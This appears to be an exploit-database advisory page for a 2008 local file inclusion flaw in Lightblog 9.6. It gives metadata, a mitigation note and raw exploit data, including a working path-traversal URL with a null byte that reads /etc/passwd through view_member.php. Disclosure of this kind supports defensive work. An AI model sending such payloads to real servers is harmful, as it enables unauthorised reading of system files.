header-logo
Suggest Exploit
vendor:
Lightblog
by:
muuratsalo
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Lightblog
Affected Version From: 9.6
Affected Version To: 9.6
Patch Exists: NO
Related CWE: N/A
CPE: a:lightblog:lightblog:9.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

lightblog 9.6 local file inclusion vulnerability

A local file inclusion vulnerability exists in Lightblog 9.6. An attacker can exploit this vulnerability to include a file from the local system by sending a specially crafted HTTP request to the vulnerable application. This can be used to read sensitive files from the local system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used to include files from the local system.
Source

Exploit-DB raw data:

lightblog 9.6 local file inclusion vulnerability

download   http://www.publicwarehouse.co.uk/php_scripts/lightblog.php

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit 
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-02-18]